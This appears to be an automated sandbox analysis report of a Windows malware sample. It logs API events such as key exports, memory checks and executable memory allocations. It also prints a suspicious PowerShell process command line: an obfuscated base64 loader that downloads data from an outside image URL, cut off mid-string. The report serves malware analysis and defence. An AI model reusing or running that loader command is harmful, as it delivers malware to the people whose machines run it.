WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: fdf' , 'dfdf' , 'dadsa' , 'de' , 'cu')) console_handle: 0x0000027f	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx console_handle: 0x0000028b	1	1
WriteConsoleW Oct. 19, 2023, 6:25 p.m.	buffer: ception console_handle: 0x00000297	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 86 events)

Time & API	Arguments	Status	Return
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055b038 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ad78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ad78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ad78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055a978 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055a978 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055a978 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055a978 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055a978 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055a978 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055a478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055a478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055a478 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055af78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055af78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055af78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ab38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055af78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055af78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055af78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055af78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055af78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055af78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055af78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055ae38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055a5b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0055a5b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002cd768 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002cdde8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002cdde8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002cdde8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002cd8a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002cd8a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002cd8a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002cd8a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002cd8a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Oct. 19, 2023, 6:25 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x002cd8a8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 19, 2023, 6:25 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 291 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fa7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fa5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f35000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f36000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f97000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f98000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f99000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c85000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c86000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c87000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c89000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c8e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c8f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c91000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 19, 2023, 6:25 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04c94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JAuOvhPbYLBpAuOvhPbYLG0AuOvhPbYLYQBnAuOvhPbYLGUAuOvhPbYLVQByAuOvhPbYLGwAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLJwBoAuOvhPbYLHQAuOvhPbYLdAuOvhPbYLBwAuOvhPbYLHMAuOvhPbYLOgAuOvhPbYLvAuOvhPbYLC8AuOvhPbYLdwBhAuOvhPbYLGwAuOvhPbYLbAuOvhPbYLBwAuOvhPbYLGEAuOvhPbYLcAuOvhPbYLBlAuOvhPbYLHIAuOvhPbYLYwBhAuOvhPbYLHYAuOvhPbYLZQAuOvhPbYLuAuOvhPbYLGMAuOvhPbYLbwBtAuOvhPbYLC8AuOvhPbYLdQB3AuOvhPbYLHAuOvhPbYLAuOvhPbYLLwB1AuOvhPbYLHcAuOvhPbYLcAuOvhPbYLAuOvhPbYL0AuOvhPbYLDAuOvhPbYLAuOvhPbYLOAuOvhPbYLAuOvhPbYLyAuOvhPbYLDkAuOvhPbYLOAuOvhPbYLAuOvhPbYL5AuOvhPbYLC4AuOvhPbYLcAuOvhPbYLBuAuOvhPbYLGcAuOvhPbYLJwAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLdwBlAuOvhPbYLGIAuOvhPbYLQwBsAuOvhPbYLGkAuOvhPbYLZQBuAuOvhPbYLHQAuOvhPbYLIAuOvhPbYLAuOvhPbYL9AuOvhPbYLCAuOvhPbYLAuOvhPbYLTgBlAuOvhPbYLHcAuOvhPbYLLQBPAuOvhPbYLGIAuOvhPbYLagBlAuOvhPbYLGMAuOvhPbYLdAuOvhPbYLAuOvhPbYLgAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLTgBlAuOvhPbYLHQAuOvhPbYLLgBXAuOvhPbYLGUAuOvhPbYLYgBDAuOvhPbYLGwAuOvhPbYLaQBlAuOvhPbYLG4AuOvhPbYLdAuOvhPbYLAuOvhPbYL7AuOvhPbYLCQAuOvhPbYLaQBtAuOvhPbYLGEAuOvhPbYLZwBlAuOvhPbYLEIAuOvhPbYLeQB0AuOvhPbYLGUAuOvhPbYLcwAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLAuOvhPbYLkAuOvhPbYLHcAuOvhPbYLZQBiAuOvhPbYLEMAuOvhPbYLbAuOvhPbYLBpAuOvhPbYLGUAuOvhPbYLbgB0AuOvhPbYLC4AuOvhPbYLRAuOvhPbYLBvAuOvhPbYLHcAuOvhPbYLbgBsAuOvhPbYLG8AuOvhPbYLYQBkAuOvhPbYLEQAuOvhPbYLYQB0AuOvhPbYLGEAuOvhPbYLKAuOvhPbYLAuOvhPbYLkAuOvhPbYLGkAuOvhPbYLbQBhAuOvhPbYLGcAuOvhPbYLZQBVAuOvhPbYLHIAuOvhPbYLbAuOvhPbYLAuOvhPbYLpAuOvhPbYLDsAuOvhPbYLJAuOvhPbYLBpAuOvhPbYLG0AuOvhPbYLYQBnAuOvhPbYLGUAuOvhPbYLVAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLdAuOvhPbYLAuOvhPbYLgAuOvhPbYLD0AuOvhPbYLIAuOvhPbYLBbAuOvhPbYLFMAuOvhPbYLeQBzAuOvhPbYLHQAuOvhPbYLZQBtAuOvhPbYLC4AuOvhPbYLVAuOvhPbYLBlAuOvhPbYLHgAuOvhPbYLdAuOvhPbYLAuOvhPbYLuAuOvhPbYLEUAuOvhPbY